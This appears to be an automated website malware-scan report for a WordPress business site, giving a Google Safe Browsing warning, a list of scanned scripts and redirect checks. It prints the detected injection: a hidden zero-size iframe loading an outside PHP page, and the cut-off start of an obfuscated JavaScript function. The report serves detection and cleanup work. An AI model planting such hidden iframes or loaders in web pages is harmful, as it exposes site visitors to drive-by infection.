Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=biznes.kobiz.ru
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://biznes.kobiz.ru/ | 200 OK Content-Length: 35626 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) function hashdate (str) {if(!str) {var date=new Date();var str = date.getUTCFullYear() + "/" + (date.getUTCMonth()+1) + "/" + date.getUTCDate() + " " + (date.getHours() >= 12 ? 'PM':'AM');};var table = [0,1996959894,3993919788,2567524794,124634137,1886057615,3915621685,2657392035,249268274,2044508324,3772115230,2547177864,162941995,2125561021,3887607047,2428444049,498536548,1789927666,4089016648,2227061214,450548861,1843258603,4107580753,2211677639,325883990,1684777152,4251122042,2321926636,3 Antivirus reports: Hidden iFrame found. size: 0x0 src: http://www.jafiduto.cz/images/wordpress.php <iframe src='http://www.jafiduto.cz/images/wordpress.php' width=0 height=0 frameborder=0> | ||
http://biznes.kobiz.ru/wp-includes/js/l10n.js?ver=20101110 | 200 OK Content-Length: 308 Content-Type: application/javascript | clean |
http://biznes.kobiz.ru/wp-includes/js/jquery/jquery.js?ver=1.4.4 | 200 OK Content-Length: 78620 Content-Type: application/javascript | clean |
http://biznes.kobiz.ru/wp-content/themes/genoa/library/scripts/jquery.js | 200 OK Content-Length: 84360 Content-Type: application/javascript | clean |
http://biznes.kobiz.ru/wp-content/themes/genoa/library/scripts/hoverIntent.js | 200 OK Content-Length: 1606 Content-Type: application/javascript | clean |
http://biznes.kobiz.ru/wp-content/themes/genoa/library/scripts/superfish.js | 200 OK Content-Length: 3711 Content-Type: application/javascript | clean |
http://biznes.kobiz.ru/wp-content/themes/genoa/library/scripts/supersubs.js | 200 OK Content-Length: 3275 Content-Type: application/javascript | clean |
http://biznes.kobiz.ru/wp-content/themes/genoa/library/scripts/dropdowns.js | 200 OK Content-Length: 1315 Content-Type: application/javascript | clean |
http://biznes.kobiz.ru/wp-content/themes/genoa/library/scripts/slider.js | 200 OK Content-Length: 17191 Content-Type: application/javascript | clean |
http://biznes.kobiz.ru/wp-content/themes/genoa/library/scripts/shortcodes.js | 200 OK Content-Length: 1353 Content-Type: application/javascript | clean |
http://biznes.kobiz.ru/wp-content/themes/genoa/library/scripts/nivo-slider.js | 200 OK Content-Length: 20551 Content-Type: application/javascript | clean |
http://automates.com/wp-content/themes/Basic/jm24zykg.php?id=2660714 | 500 timeout Content-Length: 30 Content-Type: text/plain | clean |
http://automates.com/test404page.js | 404 Not Found Content-Length: 331 Content-Type: text/html | clean |
http://pagead2.googlesyndication.com/pagead/show_ads.js | 200 OK Content-Length: 19492 Content-Type: text/javascript | clean |
http://biznes.kobiz.ru/wp-content/plugins/contact-form-7/jquery.form.js?ver=2.52 | 200 OK Content-Length: 24152 Content-Type: application/javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: biznes.kobiz.ru
Result:
HTTP/1.1 200 OK
Cache-Control: max-age=0
Connection: close
Date: Sun, 25 Jan 2015 18:36:46 GMT
Server: nginx
Content-Type: text/html; charset=UTF-8
Expires: Sun, 25 Jan 2015 18:36:45 GMT
X-Pingback: http://biznes.kobiz.ru/xmlrpc.php
X-UA-Compatible: IE=EmulateIE7
GET / HTTP/1.1
Host: biznes.kobiz.ru
Result:
HTTP/1.1 200 OK
Cache-Control: max-age=0
Connection: close
Date: Sun, 25 Jan 2015 18:36:46 GMT
Server: nginx
Content-Type: text/html; charset=UTF-8
Expires: Sun, 25 Jan 2015 18:36:45 GMT
X-Pingback: http://biznes.kobiz.ru/xmlrpc.php
X-UA-Compatible: IE=EmulateIE7
Second query (visit from search engine):
GET / HTTP/1.1
Host: biznes.kobiz.ru
Referer: http://www.google.com/search?q=biznes.kobiz.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: biznes.kobiz.ru
Referer: http://www.google.com/search?q=biznes.kobiz.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.